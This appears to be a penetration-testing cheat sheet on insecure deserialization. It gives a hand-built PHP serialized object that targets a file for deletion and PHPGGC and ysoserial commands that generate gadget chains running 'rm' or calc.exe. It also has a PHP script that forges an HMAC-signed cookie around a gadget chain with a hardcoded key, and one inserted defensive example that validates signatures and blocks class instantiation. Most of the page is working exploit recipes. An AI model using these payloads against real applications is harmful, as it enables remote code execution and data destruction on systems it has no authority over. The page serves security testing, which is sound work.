# Insecure Deserialization

## PHP

### Manual serialization

Manually build the serialized object, overriding the class's internal members to reach specific functionality (requires access to the application's source code).

```php
<?php
// The app's class definition deletes a template file in the class destructor.
// The object is instantiated from the "session" cookie.

class CustomTemplate {
    // make sure the access attribute is "public"
    public $template_file_path;
}

$c = new CustomTemplate();
$c->template_file_path = "/path/file-to-delete.txt";

// final serialized PHP object
echo serialize($c);

/* output
O:14:"CustomTemplate":1:{s:18:"template_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>
```

### PHPGGC

Generates gadget chains automatically when no source code review is possible.

```
git clone https://github.com/ambionics/phpggc.git
```

```
phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0
```

### SHA1-HMAC - PHP signed gadget chain

```php
<?php

// placeholder: the phpggc output goes here (the original value is missing from this page)
$phpgcc_object = "<PHPGGC_OUTPUT>";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";

$cookie = urlencode('{"token":"' . $phpgcc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpgcc_object, $secretKey) . '"}');
echo $cookie;
?>
```

{% embed url="<https://github.com/ambionics/phpggc>" %}
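The receiving side of that cookie format, as an added defensive example (not code from the original page or from PHPGGC): verify the HMAC before decoding, then refuse to instantiate classes so that a token signed with a leaked key still cannot trigger a gadget chain. The function names, the demo key, the sample payloads and the assumption that `token` is base64 are all constructed for illustration.

```php
<?php
// Added defensive example; names, key and sample payloads are constructed.

function load_signed_token(string $rawCookie, string $secretKey): ?array
{
    // Same envelope as above: URL-encoded JSON with "token" and "sig_hmac_sha1".
    $data = json_decode(urldecode($rawCookie), true);
    if (!is_array($data)
        || !is_string($data['token'] ?? null)
        || !is_string($data['sig_hmac_sha1'] ?? null)) {
        return null;
    }

    // 1. Verify the signature before touching the payload (constant-time compare).
    $expected = hash_hmac('sha1', $data['token'], $secretKey);
    if (!hash_equals($expected, $data['sig_hmac_sha1'])) {
        return null;
    }

    // 2. A valid signature only proves knowledge of the key. Refuse to
    //    instantiate classes, so no __wakeup()/__destruct() of an app class runs.
    $raw = base64_decode($data['token'], true);
    if ($raw === false) {
        return null;
    }
    $value = unserialize($raw, ['allowed_classes' => false]);
    return is_array($value) ? $value : null;   // plain arrays only
}

// Builds a cookie in the page's format (used only to create test data).
function make_cookie(string $serialized, string $key): string
{
    $token = base64_encode($serialized);
    return urlencode(json_encode([
        'token' => $token,
        'sig_hmac_sha1' => hash_hmac('sha1', $token, $key),
    ]));
}

$key  = 'constructed-demo-key';
$data = serialize(['user' => 'alice']);
var_dump(load_signed_token(make_cookie($data, $key), $key));        // case: valid cookie
var_dump(load_signed_token(make_cookie($data, 'wrong-key'), $key)); // case: bad signature
var_dump(load_signed_token(make_cookie('O:8:"stdClass":0:{}', $key), $key)); // case: signed object
```

Where the session data allows it, storing it as JSON instead of a serialized PHP object removes the `unserialize()` call entirely.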

## Java

```shell
# there is no jar!
git clone https://github.com/frohoff/ysoserial.git
```

```bash
# jar download
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
```

```
java -jar ysoserial.jar CommonsCollections4 calc.exe
```

```
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt' | base64 -w0
```

{% embed url="<https://github.com/frohoff/ysoserial>" %}

## .NET

```
git clone https://github.com/pwntester/ysoserial.net.git
```

{% embed url="<https://github.com/pwntester/ysoserial.net>" %}

